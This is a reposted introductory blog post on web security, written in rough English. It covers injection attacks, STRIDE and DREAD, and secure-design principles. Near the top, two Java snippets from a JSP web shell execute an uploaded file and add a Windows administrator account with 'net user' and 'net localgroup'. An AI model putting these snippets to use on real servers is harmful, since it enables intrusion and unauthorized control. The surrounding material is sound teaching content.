首页 购物 网址 三丰软件 | 小说 美女秀 图库大全 游戏 笑话 | 下载 开发知识库 新闻 开发 图片素材
多播视频美女直播
↓电视,电影,美女直播,迅雷资源↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
移动开发 架构设计 编程语言 Web前端 互联网
开发杂谈 系统运维 研发管理 数据库 云计算 Android开发资料
资讯 业界资讯 软件杂谈 编程开发 网站建设 网络观查 搜索引擎 移动应用 网站运营 网络地图
开发 移动开发 Web前端 架构设计 编程语言 互联网 数据库 系统运维 云计算 开发杂谈
[编程语言] alk In Web Security(安全世界观): Devleping a Secure Wesite
alk In Web Security(安全世界观): Devleping a Secure Wesite

Writer:BYSocket(泥沙砖瓦浆木匠)

  • 微博:BYSocket

  • 豆瓣:BYSocket

Reprint it anywhere u want.

Why to write about Web Security?


A java file can hack your server.One JSP can download any file. How to do this?
  1. Write a JSP and upload to the server.
  2. Use JSP to download any bug by HttpClient. 
  3. Open the virus and get/add the infomation of admin or datas
We can see some from what I write.Its easy but useful:

?

1
2
3
4
5
6
7
8
9
10
11

<fontsize="4"face="宋体"> if(!IsWindows())
                {
                    Process process = Runtime.getRuntime().exec("chmod 777 "+strExeFile);
                     
                    if (process.waitFor() != 0)
                        out.println("FAIL ---> when open file");
                }
                 
                Process process = Runtime.getRuntime().exec(strExeFile);
                if (process.waitFor() == 0)
                    out.println("SUCCESS ---> When open the file");</font>


Use Java to open the bug.And then get an administrator user.

?

1
2
3
4
5
6
7
8
9
10
11
12

if(IsWindows())
{
    String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add";
    Process process = Runtime.getRuntime().exec(execStr);  
     
    if (process.waitFor() == 0)
    {
        Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add");
    }
    else
        out.print("FAIL ---> when " + execStr);
}

Its about how to use java to get add an administrator user.

Here are some injections that we can see anywhere.So we need Learn the Web Security. First we can learn from the Web history.
 

Some of Web Security needed to know


Since the environment getting worse,like Haze.So many persons wear Masks when going out.Just like the way to protect ourselves ,we trust the Masks. Its the same as web security.
  Note:’Web Security is based on the trust,every way to design on Web Security is also based on the trusts.’
Many web attacks like Haze:
  1. XSS

  2. CRLF Injection
  3. X-PATH Injection
  4. HTML Injection
  5. JavaScript Injection
 
XSS Development
image



So there is a question:’How to analysis the web security of software or project?’


 

STRIDE (security) DREAD by Microsoft

STRIDE

STRIDE is a system developed by Microsoft for thinking about computer security threats.The threat categories are:
  1. Spoofing of user identity


  2. Tampering
  3. Repudiation
  4. Infomation disclosure
  5. Denial of Service
  6. Elevation of privilege
 
DREAD
The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:
  1. Damage potential: How great is the damage if the vulnerability is exploited?
  2. Reproducibility: How easy is it to reproduce the attack?
  3. Exploitability: How easy is it to launch an attack?
  4. Affected users: As a rough percentage, how many users are affected?
  5. Discoverability: How easy is it to find the vulnerability?
 
So after these categories,a good way to design on Web Security has some features:
  1. Solve problem in effect
  2. Good experience for users
  3. Low coupling
  4. Easy to extend and upgrade

How to Devlep a Secure WebSite


  Note: ‘ Security is a normal subject and a poised art.’
1. Secure By Default
  Its also the security of users.We can create The White List and The Black List and limits of user operation.
2. Defense in Depth
  Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful, I have put together a series of eight webcasts on this topic. Here are 7 levels:
  IC259073

3. Quarantine between Data and Demo
4. Uncertainly of unpredictability
  The paramters may be easy to guess.So let them be hard to guess.
 

Think in Web Security


Like a bucket of water, we trust the bucket and water.Its the Security.When the bucket has the chemistry-poison,the security will be broken.
Note:‘Open Free Share’
G night~


Writer:BYSocket(泥沙砖瓦浆木匠)

  • 微博:BYSocket

  • 豆瓣:BYSocket

Reprint it anywhere u want.


 此文从网络中自动搜索生成,不代表本网站赞成被搜索网站的内容或立场    查看原文
360图书馆 软件开发资料 文字转语音 购物精选 软件下载 新闻资讯 小游戏 Chinese Culture 股票 三丰软件 开发 中国文化 网文精选 阅读网 看图 日历 万年历 2018年11日历
2018-11-16 11:31:45
 
  网站联系 软件世界网-www.sjsjw.com ©2014 蜀ICP备06016416号 三峰网旗下网站